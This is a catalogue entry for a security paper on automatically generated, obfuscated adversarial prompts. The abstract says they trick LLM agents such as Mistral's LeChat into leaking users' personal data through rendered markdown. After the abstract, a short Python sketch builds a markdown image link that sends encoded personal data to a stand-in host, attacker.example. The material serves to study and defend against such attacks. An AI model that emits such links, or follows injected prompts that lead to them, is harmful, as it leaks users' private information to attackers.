Imprompter: Tricking LLM Agents into Improper Tool Use
Format: | Article |
---|---|
Language: | English |
Online access: | Order full text |
Summary: | Large Language Model (LLM) Agents are an emerging computing paradigm that blends generative machine learning with tools such as code interpreters, web browsing, email, and more generally, external resources. These agent-based systems represent an emerging shift in personal computing. We contribute to the security foundations of agent-based systems and surface a new class of automatically computed obfuscated adversarial prompt attacks that violate the confidentiality and integrity of user resources connected to an LLM agent. We show how prompt optimization techniques can find such prompts automatically given the weights of a model. We demonstrate that such attacks transfer to production-level agents. For example, we show an information exfiltration attack on Mistral's LeChat agent that analyzes a user's conversation, picks out personally identifiable information, and formats it into a valid markdown command that results in leaking that data to the attacker's server. This attack shows a nearly 80% success rate in an end-to-end evaluation. We conduct a range of experiments to characterize the efficacy of these attacks and find that they reliably work on emerging agent-based systems like Mistral's LeChat, ChatGLM, and Meta's Llama. These attacks are multimodal, and we show variants in the text-only and image domains. |
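
The exfiltration channel described in the abstract relies on the agent emitting markdown that, when rendered by the chat client, issues a request to an attacker-controlled URL carrying the extracted personal data. Below is a minimal sketch of that pattern, assuming a hypothetical attacker endpoint; the server URL, function name, and example data are illustrative and not taken from the paper.

```python
# Sketch of the markdown-based exfiltration pattern described in the abstract:
# an adversarial prompt induces the agent to output a markdown image whose URL
# embeds PII from the conversation. Rendering that markdown triggers an HTTP
# request that delivers the data to the attacker's server.
# The endpoint and sample data below are hypothetical.
from urllib.parse import quote

ATTACKER_SERVER = "https://attacker.example/collect"  # hypothetical endpoint

def exfiltration_markdown(pii: str) -> str:
    """Build the kind of markdown image tag that would leak `pii` when rendered."""
    return f"![img]({ATTACKER_SERVER}?d={quote(pii)})"

print(exfiltration_markdown("alice@example.com, DOB 1990-01-01"))
# -> ![img](https://attacker.example/collect?d=alice%40example.com%2C%20DOB%201990-01-01)
```
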
DOI: | 10.48550/arxiv.2410.14923 |